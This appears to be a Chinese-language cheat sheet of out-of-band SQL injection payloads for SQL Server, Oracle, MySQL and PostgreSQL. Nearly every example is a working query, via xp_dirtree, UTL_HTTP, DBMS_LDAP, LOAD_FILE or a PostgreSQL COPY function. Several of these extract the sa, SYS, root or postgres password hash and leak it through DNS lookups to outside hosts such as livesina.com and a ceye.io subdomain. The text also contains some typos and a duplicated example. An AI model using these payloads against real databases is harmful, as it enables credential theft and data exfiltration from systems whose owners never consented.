支持的数据库类型
- SQL Server
- Mysql
- Oracl
- PostgresSQL
注入姿势
SQL Server
Example:
DECLARE @host varchar ( 1024 );
SELECT @host =( SELECT TOP 1
master . dbo . fn_varbintohexstr ( password_hash )
FROM sys . sql_logins WHERE name = 'sa' )
+ '.s.livesina.com' ;
EXEC ( ' master .. xp_dirtree
"\\'+@host+'\foobar$"');
Oracle
Example1:
SELECT UTL_INADDR.GET_HOST_ADDRESS('test.y.s.livesina.com');
Example2:
SELECT UTL_HTTP.REQUEST('http://test.y.livesina.com/test') FROM DUAL;
Example3:
SELECT UTL_HTTP.REQUEST('http://test.y.livesina.com/test') FROM DUAL;
Example4:
SELECT HTTPURITYPE('http://test.y.livesina.com/test').GETCLOB() FROM DUAL;
Example5:
SELECT DBMS_LDAP.INIT(('test.s.livesina.com',80) FROM DUAL;
Example6:
SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.s.livesina.com',80) FROM DUAL;
Mysql
Exmaple:
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.s.livesina.com\\abc'));
SELECT * from test WHERE id=1 and 1=2 UNION SELECT 1,LOAD_FILE(CONCAT('\\\\',(select DATABASE()),'.mysql.ip.port.qlsmyg.ceye.io\\abc'));
SELECT * from test WHERE id=1 and 1=(SELECT LOAD_FILE(CONCAT('\\\\',(select VERSION()),'.mysql.ip.port.qlsmyg.ceye.io\\abc')));
PostgreSQL
Example:
DROP TABLE IF EXISTS table_output;CREATE TABLE table_output(content text);CREATE OR REPLACE FUNCTION temp_function()
RETURNS VOID AS $$
DECLARE exec_cmd TEXT;DECLARE query_result TEXT;BEGINSELECT INTO query_result (SELECT passwd
FROM pg_shadow WHERE usename='postgres');
exec_cmd := E'COPY table_output(content)
FROM E\'\\\\\\\\'||query_result||E'.s.livesina.com\\\\foobar.txt\'';
EXECUTE exec_cmd;END;
$$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT temp_function();